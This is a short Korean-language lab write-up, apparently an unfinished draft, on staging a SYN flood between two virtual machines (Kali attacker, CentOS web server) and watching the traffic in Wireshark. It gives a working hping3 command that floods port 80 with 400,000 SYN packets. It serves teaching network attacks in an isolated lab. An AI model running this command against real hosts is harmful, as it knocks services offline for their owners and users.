- 모든 실습은 VM Ware 환경에서 진행됩니다
실습환경
공격자 : kali linux
공격자 IP : 192.168.0.138
공격 대상 : Cent OS
사전 준비 : HTTP 서비스 활성화 (80번 포트 Open)
피해자 IP : 192.168.0.135
공격 실행
1) Kali 에서 터미널 실행
hping3 명령어를 이용하여 SYN 패킷 전송
# hping3 192.168.0.135 -p 80 -S --faster -c 400000
- -c 400000 : 40만개 패킷만 보냄
- -p : 목적지 포트 설정
- -S : TCP SYN 패킷을 보냄


2) 공격 대상 PC 에서 Network History 증가 확인

3) Wireshark 로 보낸 패킷 확인

칼리 리눅스의 특성으로 RST 보내는 거 적기